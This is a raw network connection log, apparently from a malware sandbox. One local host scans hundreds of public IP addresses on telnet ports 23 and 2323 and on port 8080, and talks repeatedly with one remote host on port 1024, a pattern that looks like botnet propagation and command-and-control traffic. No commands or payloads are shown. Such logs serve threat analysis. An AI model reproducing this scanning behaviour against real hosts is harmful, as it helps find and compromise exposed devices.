Nov 22, 2023 08:37:48.433012009 CET	54320	23	192.168.2.23	160.87.100.141
Nov 22, 2023 08:37:48.433012009 CET	54320	23	192.168.2.23	52.132.189.132
Nov 22, 2023 08:37:48.433015108 CET	54320	23	192.168.2.23	54.139.101.90
Nov 22, 2023 08:37:48.433015108 CET	54320	23	192.168.2.23	173.247.106.224
Nov 22, 2023 08:37:48.433044910 CET	54320	23	192.168.2.23	36.224.92.99
Nov 22, 2023 08:37:48.433047056 CET	54320	2323	192.168.2.23	25.93.121.37
Nov 22, 2023 08:37:48.433047056 CET	54320	23	192.168.2.23	156.40.156.64
Nov 22, 2023 08:37:48.433047056 CET	54320	23	192.168.2.23	134.97.50.132
Nov 22, 2023 08:37:48.433048010 CET	54320	23	192.168.2.23	135.18.91.88
Nov 22, 2023 08:37:48.433048010 CET	54320	23	192.168.2.23	76.163.6.105
Nov 22, 2023 08:37:48.433048010 CET	54320	2323	192.168.2.23	200.33.129.8
Nov 22, 2023 08:37:48.433048964 CET	54320	23	192.168.2.23	135.173.68.98
Nov 22, 2023 08:37:48.433058977 CET	54320	23	192.168.2.23	42.191.47.239
Nov 22, 2023 08:37:48.433062077 CET	54320	23	192.168.2.23	145.0.231.1
Nov 22, 2023 08:37:48.433062077 CET	54320	2323	192.168.2.23	204.204.163.146
Nov 22, 2023 08:37:48.433063984 CET	54320	23	192.168.2.23	138.210.114.167
Nov 22, 2023 08:37:48.433063984 CET	54320	23	192.168.2.23	91.236.225.99
Nov 22, 2023 08:37:48.433064938 CET	54320	23	192.168.2.23	222.167.42.155
Nov 22, 2023 08:37:48.433063984 CET	54320	23	192.168.2.23	111.36.196.5
Nov 22, 2023 08:37:48.433064938 CET	54320	23	192.168.2.23	208.157.179.241
Nov 22, 2023 08:37:48.433063984 CET	54320	23	192.168.2.23	106.171.228.148
Nov 22, 2023 08:37:48.433065891 CET	54320	23	192.168.2.23	122.73.142.83
Nov 22, 2023 08:37:48.433063984 CET	54320	23	192.168.2.23	144.101.202.213
Nov 22, 2023 08:37:48.433065891 CET	54320	23	192.168.2.23	121.115.34.236
Nov 22, 2023 08:37:48.433073044 CET	54320	23	192.168.2.23	165.245.183.177
Nov 22, 2023 08:37:48.433073044 CET	54320	23	192.168.2.23	62.46.72.159
Nov 22, 2023 08:37:48.433075905 CET	54320	23	192.168.2.23	157.199.117.43
Nov 22, 2023 08:37:48.433075905 CET	54320	23	192.168.2.23	195.47.114.44
Nov 22, 2023 08:37:48.433105946 CET	54320	23	192.168.2.23	73.41.207.154
Nov 22, 2023 08:37:48.433105946 CET	54320	23	192.168.2.23	218.160.47.55
Nov 22, 2023 08:37:48.433105946 CET	54320	23	192.168.2.23	54.27.51.21
Nov 22, 2023 08:37:48.433105946 CET	54320	23	192.168.2.23	70.232.88.77
Nov 22, 2023 08:37:48.433108091 CET	54320	23	192.168.2.23	102.116.2.194
Nov 22, 2023 08:37:48.433109045 CET	54320	23	192.168.2.23	105.6.66.238
Nov 22, 2023 08:37:48.433109045 CET	54320	23	192.168.2.23	62.66.193.225
Nov 22, 2023 08:37:48.433128119 CET	54320	2323	192.168.2.23	96.175.5.118
Nov 22, 2023 08:37:48.433129072 CET	54320	23	192.168.2.23	34.209.83.242
Nov 22, 2023 08:37:48.433130026 CET	54320	23	192.168.2.23	171.35.200.145
Nov 22, 2023 08:37:48.433130026 CET	54320	23	192.168.2.23	179.217.56.112
Nov 22, 2023 08:37:48.433131933 CET	54320	23	192.168.2.23	63.150.58.73
Nov 22, 2023 08:37:48.433140993 CET	54320	23	192.168.2.23	191.64.63.151
Nov 22, 2023 08:37:48.433140993 CET	54320	23	192.168.2.23	49.205.183.243
Nov 22, 2023 08:37:48.433140993 CET	54320	23	192.168.2.23	64.171.176.25
Nov 22, 2023 08:37:48.433144093 CET	54320	23	192.168.2.23	82.161.217.26
Nov 22, 2023 08:37:48.433144093 CET	54320	23	192.168.2.23	76.87.59.190
Nov 22, 2023 08:37:48.433144093 CET	54320	23	192.168.2.23	210.135.249.189
Nov 22, 2023 08:37:48.433144093 CET	54320	23	192.168.2.23	121.191.3.252
Nov 22, 2023 08:37:48.433146000 CET	54320	23	192.168.2.23	52.0.23.27
Nov 22, 2023 08:37:48.433144093 CET	54320	23	192.168.2.23	162.194.124.152
Nov 22, 2023 08:37:48.433146000 CET	54320	23	192.168.2.23	67.207.150.135
Nov 22, 2023 08:37:48.433144093 CET	54320	23	192.168.2.23	159.30.247.210
Nov 22, 2023 08:37:48.433146000 CET	54320	23	192.168.2.23	146.35.4.63
Nov 22, 2023 08:37:48.433146000 CET	54320	23	192.168.2.23	197.18.23.65
Nov 22, 2023 08:37:48.433190107 CET	54320	23	192.168.2.23	63.20.124.13
Nov 22, 2023 08:37:48.433191061 CET	54320	2323	192.168.2.23	129.148.220.106
Nov 22, 2023 08:37:48.433191061 CET	54320	23	192.168.2.23	19.41.165.161
Nov 22, 2023 08:37:48.433191061 CET	54320	23	192.168.2.23	143.210.161.167
Nov 22, 2023 08:37:48.433192968 CET	54320	23	192.168.2.23	41.111.248.73
Nov 22, 2023 08:37:48.433191061 CET	54320	23	192.168.2.23	137.120.135.118
Nov 22, 2023 08:37:48.433192968 CET	54320	2323	192.168.2.23	34.121.100.118
Nov 22, 2023 08:37:48.433192968 CET	54320	23	192.168.2.23	8.43.1.94
Nov 22, 2023 08:37:48.433192968 CET	54320	23	192.168.2.23	130.177.253.83
Nov 22, 2023 08:37:48.433202982 CET	54320	2323	192.168.2.23	137.134.78.218
Nov 22, 2023 08:37:48.433202982 CET	54320	23	192.168.2.23	58.67.79.132
Nov 22, 2023 08:37:48.433207035 CET	54320	23	192.168.2.23	191.106.69.60
Nov 22, 2023 08:37:48.433207035 CET	54320	23	192.168.2.23	120.235.134.80
Nov 22, 2023 08:37:48.433209896 CET	54320	23	192.168.2.23	151.110.151.81
Nov 22, 2023 08:37:48.433211088 CET	54320	23	192.168.2.23	160.125.21.84
Nov 22, 2023 08:37:48.433209896 CET	54320	23	192.168.2.23	158.183.66.73
Nov 22, 2023 08:37:48.433213949 CET	54320	23	192.168.2.23	143.9.175.252
Nov 22, 2023 08:37:48.433213949 CET	54320	23	192.168.2.23	185.228.233.219
Nov 22, 2023 08:37:48.433218002 CET	54320	23	192.168.2.23	94.101.148.136
Nov 22, 2023 08:37:48.433218956 CET	54320	2323	192.168.2.23	160.33.200.188
Nov 22, 2023 08:37:48.433218956 CET	54320	23	192.168.2.23	154.245.219.191
Nov 22, 2023 08:37:48.433218956 CET	54320	23	192.168.2.23	94.125.198.40
Nov 22, 2023 08:37:48.433233976 CET	54320	23	192.168.2.23	138.125.82.109
Nov 22, 2023 08:37:48.433233976 CET	54320	23	192.168.2.23	146.144.199.98
Nov 22, 2023 08:37:48.433238029 CET	54320	23	192.168.2.23	45.124.51.55
Nov 22, 2023 08:37:48.433238983 CET	54320	23	192.168.2.23	44.61.186.56
Nov 22, 2023 08:37:48.433238983 CET	54320	23	192.168.2.23	87.198.234.196
Nov 22, 2023 08:37:48.433247089 CET	54320	23	192.168.2.23	90.182.254.208
Nov 22, 2023 08:37:48.433248043 CET	54320	23	192.168.2.23	209.250.203.93
Nov 22, 2023 08:37:48.433248043 CET	54320	2323	192.168.2.23	221.200.2.100
Nov 22, 2023 08:37:48.433253050 CET	54320	23	192.168.2.23	113.175.44.54
Nov 22, 2023 08:37:48.433253050 CET	54320	23	192.168.2.23	115.57.224.236
Nov 22, 2023 08:37:48.433253050 CET	54320	23	192.168.2.23	93.124.211.169
Nov 22, 2023 08:37:48.433253050 CET	54320	23	192.168.2.23	43.118.72.28
Nov 22, 2023 08:37:48.433253050 CET	54320	23	192.168.2.23	183.221.75.232
Nov 22, 2023 08:37:48.433255911 CET	54320	23	192.168.2.23	108.118.69.253
Nov 22, 2023 08:37:48.433257103 CET	54320	23	192.168.2.23	44.202.119.255
Nov 22, 2023 08:37:48.433270931 CET	54320	23	192.168.2.23	116.2.126.226
Nov 22, 2023 08:37:48.433312893 CET	54320	23	192.168.2.23	102.92.113.104
Nov 22, 2023 08:37:48.433315039 CET	54320	23	192.168.2.23	170.174.4.216
Nov 22, 2023 08:37:48.433315039 CET	54320	23	192.168.2.23	111.77.90.151
Nov 22, 2023 08:37:48.433320045 CET	54320	23	192.168.2.23	123.63.112.110
Nov 22, 2023 08:37:48.433320999 CET	54320	23	192.168.2.23	19.55.46.151
Nov 22, 2023 08:37:48.433320999 CET	54320	23	192.168.2.23	97.218.23.81
Nov 22, 2023 08:37:48.433321953 CET	54320	23	192.168.2.23	126.250.57.250
Nov 22, 2023 08:37:48.433321953 CET	54320	23	192.168.2.23	137.35.134.181
Nov 22, 2023 08:37:48.433324099 CET	54320	23	192.168.2.23	84.240.22.16
Nov 22, 2023 08:37:48.433324099 CET	54320	2323	192.168.2.23	69.131.169.159
Nov 22, 2023 08:37:48.433324099 CET	54320	23	192.168.2.23	68.239.53.40
Nov 22, 2023 08:37:48.433331013 CET	54320	23	192.168.2.23	64.180.140.155
Nov 22, 2023 08:37:48.433331013 CET	54320	2323	192.168.2.23	154.133.26.109
Nov 22, 2023 08:37:48.433331013 CET	54320	23	192.168.2.23	169.18.84.154
Nov 22, 2023 08:37:48.433331013 CET	54320	23	192.168.2.23	80.115.33.106
Nov 22, 2023 08:37:48.433331013 CET	54320	23	192.168.2.23	24.208.231.172
Nov 22, 2023 08:37:48.433358908 CET	54320	23	192.168.2.23	1.73.186.5
Nov 22, 2023 08:37:48.433360100 CET	54320	23	192.168.2.23	58.168.235.73
Nov 22, 2023 08:37:48.433360100 CET	54320	2323	192.168.2.23	145.164.52.253
Nov 22, 2023 08:37:48.433362961 CET	54320	23	192.168.2.23	179.91.88.79
Nov 22, 2023 08:37:48.433362961 CET	54320	23	192.168.2.23	217.30.130.206
Nov 22, 2023 08:37:48.433362961 CET	54320	23	192.168.2.23	190.6.9.127
Nov 22, 2023 08:37:48.433362961 CET	54320	23	192.168.2.23	94.172.32.7
Nov 22, 2023 08:37:48.433383942 CET	54320	23	192.168.2.23	40.29.26.201
Nov 22, 2023 08:37:48.433383942 CET	54320	23	192.168.2.23	168.185.230.132
Nov 22, 2023 08:37:48.433383942 CET	54320	23	192.168.2.23	191.52.5.179
Nov 22, 2023 08:37:48.433383942 CET	54320	23	192.168.2.23	175.137.195.105
Nov 22, 2023 08:37:48.433383942 CET	54320	23	192.168.2.23	212.91.146.65
Nov 22, 2023 08:37:48.433386087 CET	54320	23	192.168.2.23	146.232.161.114
Nov 22, 2023 08:37:48.433386087 CET	54320	23	192.168.2.23	8.179.84.31
Nov 22, 2023 08:37:48.433389902 CET	54320	23	192.168.2.23	166.212.227.143
Nov 22, 2023 08:37:48.433387041 CET	54320	23	192.168.2.23	119.1.35.87
Nov 22, 2023 08:37:48.433386087 CET	54320	23	192.168.2.23	89.187.25.6
Nov 22, 2023 08:37:48.433386087 CET	54320	23	192.168.2.23	185.200.251.111
Nov 22, 2023 08:37:48.433387041 CET	54320	23	192.168.2.23	47.221.122.50
Nov 22, 2023 08:37:48.433386087 CET	54320	23	192.168.2.23	125.108.28.111
Nov 22, 2023 08:37:48.433387041 CET	54320	23	192.168.2.23	4.150.132.135
Nov 22, 2023 08:37:48.433387041 CET	54320	23	192.168.2.23	203.36.213.188
Nov 22, 2023 08:37:48.433423996 CET	54320	23	192.168.2.23	177.53.150.216
Nov 22, 2023 08:37:48.433423996 CET	54320	23	192.168.2.23	65.128.226.207
Nov 22, 2023 08:37:48.433424950 CET	54320	23	192.168.2.23	142.156.73.253
Nov 22, 2023 08:37:48.433424950 CET	54320	23	192.168.2.23	217.54.21.143
Nov 22, 2023 08:37:48.433424950 CET	54320	23	192.168.2.23	185.92.16.215
Nov 22, 2023 08:37:48.433424950 CET	54320	2323	192.168.2.23	222.140.216.251
Nov 22, 2023 08:37:48.433424950 CET	54320	23	192.168.2.23	175.15.160.98
Nov 22, 2023 08:37:48.433425903 CET	54320	23	192.168.2.23	198.37.33.253
Nov 22, 2023 08:37:48.433428049 CET	54320	23	192.168.2.23	9.87.7.74
Nov 22, 2023 08:37:48.433428049 CET	54320	23	192.168.2.23	164.62.247.164
Nov 22, 2023 08:37:48.433428049 CET	54320	23	192.168.2.23	5.102.107.146
Nov 22, 2023 08:37:48.433430910 CET	54320	2323	192.168.2.23	136.71.32.96
Nov 22, 2023 08:37:48.433430910 CET	54320	23	192.168.2.23	24.53.64.65
Nov 22, 2023 08:37:48.433432102 CET	54320	23	192.168.2.23	204.31.124.79
Nov 22, 2023 08:37:48.433445930 CET	54320	23	192.168.2.23	86.214.35.28
Nov 22, 2023 08:37:48.433453083 CET	54320	23	192.168.2.23	142.7.217.243
Nov 22, 2023 08:37:48.433453083 CET	54320	23	192.168.2.23	77.18.227.48
Nov 22, 2023 08:37:48.433454037 CET	54320	23	192.168.2.23	210.122.107.37
Nov 22, 2023 08:37:48.433454037 CET	54320	23	192.168.2.23	142.15.191.240
Nov 22, 2023 08:37:48.433454037 CET	54320	23	192.168.2.23	37.254.115.221
Nov 22, 2023 08:37:48.433454037 CET	54320	23	192.168.2.23	141.16.169.61
Nov 22, 2023 08:37:48.433458090 CET	54320	23	192.168.2.23	80.233.220.26
Nov 22, 2023 08:37:48.433459044 CET	54320	23	192.168.2.23	219.72.198.58
Nov 22, 2023 08:37:48.433459044 CET	54320	23	192.168.2.23	100.136.90.196
Nov 22, 2023 08:37:48.433459997 CET	54320	23	192.168.2.23	189.191.113.64
Nov 22, 2023 08:37:48.433459044 CET	54320	23	192.168.2.23	134.202.45.167
Nov 22, 2023 08:37:48.433459997 CET	54320	2323	192.168.2.23	116.18.62.170
Nov 22, 2023 08:37:48.433459997 CET	54320	23	192.168.2.23	99.71.62.18
Nov 22, 2023 08:37:48.433459997 CET	54320	2323	192.168.2.23	45.112.14.94
Nov 22, 2023 08:37:48.433459997 CET	54320	23	192.168.2.23	198.171.203.190
Nov 22, 2023 08:37:48.433459997 CET	54320	23	192.168.2.23	144.101.24.94
Nov 22, 2023 08:37:48.433461905 CET	54320	23	192.168.2.23	176.125.5.104
Nov 22, 2023 08:37:48.433461905 CET	54320	23	192.168.2.23	35.106.38.162
Nov 22, 2023 08:37:48.433471918 CET	54320	23	192.168.2.23	130.246.72.71
Nov 22, 2023 08:37:48.433509111 CET	54320	2323	192.168.2.23	84.180.104.39
Nov 22, 2023 08:37:48.433509111 CET	54320	23	192.168.2.23	192.81.163.244
Nov 22, 2023 08:37:48.433514118 CET	54320	23	192.168.2.23	42.41.214.111
Nov 22, 2023 08:37:48.433525085 CET	54320	23	192.168.2.23	223.207.222.34
Nov 22, 2023 08:37:48.433530092 CET	54320	23	192.168.2.23	27.58.179.243
Nov 22, 2023 08:37:48.433557034 CET	54320	23	192.168.2.23	141.250.24.34
Nov 22, 2023 08:37:48.433562040 CET	54320	23	192.168.2.23	220.6.132.82
Nov 22, 2023 08:37:48.433563948 CET	54320	23	192.168.2.23	219.168.18.53
Nov 22, 2023 08:37:48.433567047 CET	54320	23	192.168.2.23	75.48.4.152
Nov 22, 2023 08:37:48.433568001 CET	54320	23	192.168.2.23	34.204.156.217
Nov 22, 2023 08:37:48.433576107 CET	54320	23	192.168.2.23	8.62.27.72
Nov 22, 2023 08:37:48.433585882 CET	54320	2323	192.168.2.23	92.157.193.31
Nov 22, 2023 08:37:48.433589935 CET	54320	23	192.168.2.23	221.99.255.25
Nov 22, 2023 08:37:48.433607101 CET	54320	23	192.168.2.23	137.155.81.95
Nov 22, 2023 08:37:48.433624983 CET	54320	23	192.168.2.23	98.152.89.203
Nov 22, 2023 08:37:48.433624983 CET	54320	23	192.168.2.23	191.173.9.50
Nov 22, 2023 08:37:48.433633089 CET	54320	23	192.168.2.23	169.144.156.19
Nov 22, 2023 08:37:48.433641911 CET	54320	23	192.168.2.23	207.125.233.194
Nov 22, 2023 08:37:48.433656931 CET	54320	23	192.168.2.23	92.217.137.100
Nov 22, 2023 08:37:48.433657885 CET	54320	23	192.168.2.23	217.71.216.229
Nov 22, 2023 08:37:48.433657885 CET	54320	2323	192.168.2.23	53.158.168.145
Nov 22, 2023 08:37:48.433689117 CET	54320	23	192.168.2.23	184.98.77.26
Nov 22, 2023 08:37:48.433693886 CET	54320	23	192.168.2.23	163.126.165.104
Nov 22, 2023 08:37:48.433758020 CET	54320	23	192.168.2.23	166.236.197.9
Nov 22, 2023 08:37:48.433758020 CET	54320	23	192.168.2.23	172.112.170.73
Nov 22, 2023 08:37:48.433763027 CET	54320	23	192.168.2.23	83.149.45.37
Nov 22, 2023 08:37:48.433763027 CET	54320	23	192.168.2.23	190.41.111.92
Nov 22, 2023 08:37:48.433778048 CET	54320	23	192.168.2.23	73.68.143.37
Nov 22, 2023 08:37:48.433778048 CET	54320	23	192.168.2.23	14.156.209.114
Nov 22, 2023 08:37:48.433785915 CET	54320	23	192.168.2.23	167.0.255.223
Nov 22, 2023 08:37:48.433794022 CET	54320	23	192.168.2.23	4.171.206.97
Nov 22, 2023 08:37:48.433801889 CET	54320	2323	192.168.2.23	75.79.122.95
Nov 22, 2023 08:37:48.433804035 CET	54320	23	192.168.2.23	213.172.138.113
Nov 22, 2023 08:37:48.433815956 CET	54320	23	192.168.2.23	96.41.55.17
Nov 22, 2023 08:37:48.433815956 CET	54320	23	192.168.2.23	141.87.90.121
Nov 22, 2023 08:37:48.433820009 CET	54320	23	192.168.2.23	159.163.246.87
Nov 22, 2023 08:37:48.433831930 CET	54320	23	192.168.2.23	59.118.98.52
Nov 22, 2023 08:37:48.433840990 CET	54320	23	192.168.2.23	176.215.242.180
Nov 22, 2023 08:37:48.433847904 CET	54320	23	192.168.2.23	146.102.100.151
Nov 22, 2023 08:37:48.433849096 CET	54320	23	192.168.2.23	38.216.107.19
Nov 22, 2023 08:37:48.433872938 CET	54320	23	192.168.2.23	44.137.32.60
Nov 22, 2023 08:37:48.433873892 CET	54320	23	192.168.2.23	149.219.181.221
Nov 22, 2023 08:37:48.433873892 CET	54320	2323	192.168.2.23	85.194.155.44
Nov 22, 2023 08:37:48.433888912 CET	54320	23	192.168.2.23	195.202.241.226
Nov 22, 2023 08:37:48.433888912 CET	54320	23	192.168.2.23	140.15.220.7
Nov 22, 2023 08:37:48.433888912 CET	54320	23	192.168.2.23	96.38.200.179
Nov 22, 2023 08:37:48.433896065 CET	54320	23	192.168.2.23	174.235.58.88
Nov 22, 2023 08:37:48.433898926 CET	54320	23	192.168.2.23	66.185.199.120
Nov 22, 2023 08:37:48.433900118 CET	54320	23	192.168.2.23	115.46.38.105
Nov 22, 2023 08:37:48.433913946 CET	54320	23	192.168.2.23	74.246.107.239
Nov 22, 2023 08:37:48.433928967 CET	54320	23	192.168.2.23	170.193.217.91
Nov 22, 2023 08:37:48.433932066 CET	54320	23	192.168.2.23	174.209.39.134
Nov 22, 2023 08:37:48.433934927 CET	54320	2323	192.168.2.23	113.229.51.7
Nov 22, 2023 08:37:48.433934927 CET	54320	23	192.168.2.23	164.223.250.126
Nov 22, 2023 08:37:48.433940887 CET	54320	23	192.168.2.23	9.57.154.183
Nov 22, 2023 08:37:48.433943987 CET	54320	23	192.168.2.23	139.132.134.40
Nov 22, 2023 08:37:48.433947086 CET	54320	23	192.168.2.23	141.66.15.163
Nov 22, 2023 08:37:48.433954000 CET	54320	23	192.168.2.23	187.174.53.116
Nov 22, 2023 08:37:48.433964014 CET	54320	23	192.168.2.23	122.132.24.179
Nov 22, 2023 08:37:48.433974028 CET	54320	23	192.168.2.23	181.229.211.92
Nov 22, 2023 08:37:48.433975935 CET	54320	23	192.168.2.23	97.11.62.148
Nov 22, 2023 08:37:48.433990955 CET	54320	2323	192.168.2.23	115.189.132.132
Nov 22, 2023 08:37:48.433991909 CET	54320	23	192.168.2.23	88.22.70.144
Nov 22, 2023 08:37:48.433995962 CET	54320	23	192.168.2.23	116.33.141.190
Nov 22, 2023 08:37:48.434005022 CET	54320	23	192.168.2.23	73.214.36.209
Nov 22, 2023 08:37:48.434005976 CET	54320	23	192.168.2.23	206.236.116.2
Nov 22, 2023 08:37:48.434019089 CET	54320	23	192.168.2.23	136.239.68.3
Nov 22, 2023 08:37:48.434041023 CET	54320	23	192.168.2.23	104.31.144.135
Nov 22, 2023 08:37:48.434047937 CET	54320	23	192.168.2.23	69.31.163.224
Nov 22, 2023 08:37:48.434057951 CET	54320	23	192.168.2.23	149.209.234.130
Nov 22, 2023 08:37:48.434060097 CET	54320	23	192.168.2.23	219.158.197.189
Nov 22, 2023 08:37:48.434060097 CET	54320	23	192.168.2.23	86.69.74.96
Nov 22, 2023 08:37:48.434060097 CET	54320	23	192.168.2.23	77.158.160.23
Nov 22, 2023 08:37:48.434067011 CET	54320	23	192.168.2.23	76.232.229.44
Nov 22, 2023 08:37:48.434070110 CET	54320	23	192.168.2.23	9.30.56.34
Nov 22, 2023 08:37:48.434070110 CET	54320	23	192.168.2.23	146.135.101.62
Nov 22, 2023 08:37:48.434081078 CET	54320	2323	192.168.2.23	50.139.251.228
Nov 22, 2023 08:37:48.434169054 CET	54320	23	192.168.2.23	164.220.127.91
Nov 22, 2023 08:37:48.434169054 CET	54320	23	192.168.2.23	79.213.212.213
Nov 22, 2023 08:37:48.434171915 CET	54320	23	192.168.2.23	51.174.73.121
Nov 22, 2023 08:37:48.434171915 CET	54320	23	192.168.2.23	130.34.105.221
Nov 22, 2023 08:37:48.434171915 CET	54320	23	192.168.2.23	218.194.110.223
Nov 22, 2023 08:37:48.434171915 CET	54320	23	192.168.2.23	200.26.93.22
Nov 22, 2023 08:37:48.434171915 CET	54320	2323	192.168.2.23	135.202.216.133
Nov 22, 2023 08:37:48.434181929 CET	54320	23	192.168.2.23	122.250.77.129
Nov 22, 2023 08:37:48.504817963 CET	8080	54329	85.153.38.151	192.168.2.23
Nov 22, 2023 08:37:48.504839897 CET	8080	54329	85.153.89.100	192.168.2.23
Nov 22, 2023 08:37:48.512991905 CET	8080	54329	62.76.146.178	192.168.2.23
Nov 22, 2023 08:37:48.594446898 CET	8080	54329	95.216.175.47	192.168.2.23
Nov 22, 2023 08:37:48.598828077 CET	8080	54329	85.214.197.79	192.168.2.23
Nov 22, 2023 08:37:48.610622883 CET	8080	54329	62.109.6.215	192.168.2.23
Nov 22, 2023 08:37:48.610810041 CET	80	54328	88.130.5.18	192.168.2.23
Nov 22, 2023 08:37:48.610876083 CET	54328	80	192.168.2.23	88.130.5.18
Nov 22, 2023 08:37:48.616866112 CET	1024	52264	141.98.10.26	192.168.2.23
Nov 22, 2023 08:37:48.616954088 CET	52264	1024	192.168.2.23	141.98.10.26
Nov 22, 2023 08:37:48.617346048 CET	52264	1024	192.168.2.23	141.98.10.26
Nov 22, 2023 08:37:48.617491961 CET	8080	54329	95.164.64.117	192.168.2.23
Nov 22, 2023 08:37:48.617786884 CET	8080	54329	31.189.62.199	192.168.2.23
Nov 22, 2023 08:37:48.619146109 CET	8080	54329	94.156.252.25	192.168.2.23
Nov 22, 2023 08:37:48.624378920 CET	80	54328	88.196.49.72	192.168.2.23
Nov 22, 2023 08:37:48.625524044 CET	8080	54329	94.120.53.186	192.168.2.23
Nov 22, 2023 08:37:48.625582933 CET	54329	8080	192.168.2.23	94.120.53.186
Nov 22, 2023 08:37:48.631711960 CET	8080	54329	94.122.19.227	192.168.2.23
Nov 22, 2023 08:37:48.631764889 CET	54329	8080	192.168.2.23	94.122.19.227
Nov 22, 2023 08:37:48.632148981 CET	8080	54329	85.175.84.106	192.168.2.23
Nov 22, 2023 08:37:48.632805109 CET	8080	54329	31.176.216.23	192.168.2.23
Nov 22, 2023 08:37:48.634671926 CET	8080	54329	85.105.177.204	192.168.2.23
Nov 22, 2023 08:37:48.638103962 CET	8080	54329	94.120.173.248	192.168.2.23
Nov 22, 2023 08:37:48.638154984 CET	54329	8080	192.168.2.23	94.120.173.248
Nov 22, 2023 08:37:48.643848896 CET	8080	54329	95.140.196.195	192.168.2.23
Nov 22, 2023 08:37:48.648320913 CET	8080	54329	85.26.128.46	192.168.2.23
Nov 22, 2023 08:37:48.648792028 CET	8080	54329	31.14.124.17	192.168.2.23
Nov 22, 2023 08:37:48.654400110 CET	8080	54329	95.128.137.201	192.168.2.23
Nov 22, 2023 08:37:48.657438040 CET	8080	54329	95.183.219.176	192.168.2.23
Nov 22, 2023 08:37:48.692452908 CET	8080	54329	94.124.79.91	192.168.2.23
Nov 22, 2023 08:37:48.755721092 CET	23	54320	202.168.15.67	192.168.2.23
Nov 22, 2023 08:37:48.767357111 CET	8080	54329	95.183.10.1	192.168.2.23
Nov 22, 2023 08:37:48.783324957 CET	23	54320	59.36.172.90	192.168.2.23
Nov 22, 2023 08:37:48.798820019 CET	23	54320	218.194.110.223	192.168.2.23
Nov 22, 2023 08:37:48.804754972 CET	37215	54335	157.245.151.98	192.168.2.23
Nov 22, 2023 08:37:48.825107098 CET	1024	52264	141.98.10.26	192.168.2.23
Nov 22, 2023 08:37:48.825211048 CET	52264	1024	192.168.2.23	141.98.10.26
Nov 22, 2023 08:37:48.831619978 CET	23	54320	103.125.59.254	192.168.2.23
Nov 22, 2023 08:37:49.033066034 CET	1024	52264	141.98.10.26	192.168.2.23
Nov 22, 2023 08:37:49.406740904 CET	54329	8080	192.168.2.23	94.194.229.43
Nov 22, 2023 08:37:49.406740904 CET	54329	8080	192.168.2.23	95.155.100.124
Nov 22, 2023 08:37:49.406749964 CET	54329	8080	192.168.2.23	85.190.247.24
Nov 22, 2023 08:37:49.406774044 CET	54329	8080	192.168.2.23	31.166.54.74
Nov 22, 2023 08:37:49.406774044 CET	54329	8080	192.168.2.23	31.144.118.39
Nov 22, 2023 08:37:49.406774998 CET	54329	8080	192.168.2.23	62.230.179.241
Nov 22, 2023 08:37:49.406789064 CET	54329	8080	192.168.2.23	62.13.132.160
Nov 22, 2023 08:37:49.406789064 CET	54329	8080	192.168.2.23	62.162.161.33
Nov 22, 2023 08:37:49.406789064 CET	54329	8080	192.168.2.23	94.205.227.225
Nov 22, 2023 08:37:49.406791925 CET	54329	8080	192.168.2.23	31.173.24.185
Nov 22, 2023 08:37:49.406791925 CET	54329	8080	192.168.2.23	62.146.23.141
Nov 22, 2023 08:37:49.406791925 CET	54329	8080	192.168.2.23	94.9.192.57
Nov 22, 2023 08:37:49.406796932 CET	54329	8080	192.168.2.23	62.246.183.128
Nov 22, 2023 08:37:49.406797886 CET	54329	8080	192.168.2.23	31.243.220.196
Nov 22, 2023 08:37:49.406797886 CET	54329	8080	192.168.2.23	62.11.14.214
Nov 22, 2023 08:37:49.406796932 CET	54329	8080	192.168.2.23	85.36.12.238
Nov 22, 2023 08:37:49.406796932 CET	54329	8080	192.168.2.23	95.99.44.222
Nov 22, 2023 08:37:49.406796932 CET	54329	8080	192.168.2.23	94.81.87.69
Nov 22, 2023 08:37:49.406802893 CET	54329	8080	192.168.2.23	31.34.37.24
Nov 22, 2023 08:37:49.406809092 CET	54329	8080	192.168.2.23	94.13.60.100
Nov 22, 2023 08:37:49.406809092 CET	54329	8080	192.168.2.23	62.33.155.86
Nov 22, 2023 08:37:49.406809092 CET	54329	8080	192.168.2.23	31.46.17.176
Nov 22, 2023 08:37:49.406812906 CET	54329	8080	192.168.2.23	62.46.167.11
Nov 22, 2023 08:37:49.406826019 CET	54329	8080	192.168.2.23	95.181.237.78
Nov 22, 2023 08:37:49.406835079 CET	54329	8080	192.168.2.23	85.149.223.85
Nov 22, 2023 08:37:49.406835079 CET	54329	8080	192.168.2.23	31.25.220.29
Nov 22, 2023 08:37:49.406835079 CET	54329	8080	192.168.2.23	85.134.179.68
Nov 22, 2023 08:37:49.406835079 CET	54329	8080	192.168.2.23	85.133.200.126
Nov 22, 2023 08:37:49.406836987 CET	54329	8080	192.168.2.23	31.67.68.210
Nov 22, 2023 08:37:49.406841993 CET	54329	8080	192.168.2.23	94.78.17.45
Nov 22, 2023 08:37:49.406841993 CET	54329	8080	192.168.2.23	62.67.80.42
Nov 22, 2023 08:37:49.406841993 CET	54329	8080	192.168.2.23	85.110.97.107
Nov 22, 2023 08:37:49.406852961 CET	54329	8080	192.168.2.23	85.214.221.1
Nov 22, 2023 08:37:49.406852961 CET	54329	8080	192.168.2.23	85.212.58.191
Nov 22, 2023 08:37:49.406853914 CET	54329	8080	192.168.2.23	31.195.20.77
Nov 22, 2023 08:37:49.406853914 CET	54329	8080	192.168.2.23	95.21.140.84
Nov 22, 2023 08:37:49.406853914 CET	54329	8080	192.168.2.23	85.97.181.219
Nov 22, 2023 08:37:49.406853914 CET	54329	8080	192.168.2.23	31.160.210.229
Nov 22, 2023 08:37:49.406857014 CET	54329	8080	192.168.2.23	62.245.18.27
Nov 22, 2023 08:37:49.406861067 CET	54329	8080	192.168.2.23	94.232.64.160
Nov 22, 2023 08:37:49.406862974 CET	54329	8080	192.168.2.23	95.198.214.74
Nov 22, 2023 08:37:49.406862974 CET	54329	8080	192.168.2.23	62.109.75.176
Nov 22, 2023 08:37:49.406862974 CET	54329	8080	192.168.2.23	94.91.45.195
Nov 22, 2023 08:37:49.406862974 CET	54329	8080	192.168.2.23	62.42.45.63
Nov 22, 2023 08:37:49.406862974 CET	54329	8080	192.168.2.23	85.123.109.40
Nov 22, 2023 08:37:49.406877041 CET	54329	8080	192.168.2.23	94.0.140.12
Nov 22, 2023 08:37:49.406887054 CET	54329	8080	192.168.2.23	85.172.120.117
Nov 22, 2023 08:37:49.406887054 CET	54329	8080	192.168.2.23	62.201.111.235
Nov 22, 2023 08:37:49.406893969 CET	54329	8080	192.168.2.23	85.77.81.79
Nov 22, 2023 08:37:49.406894922 CET	54329	8080	192.168.2.23	85.102.88.71
Nov 22, 2023 08:37:49.406904936 CET	54329	8080	192.168.2.23	85.91.104.134
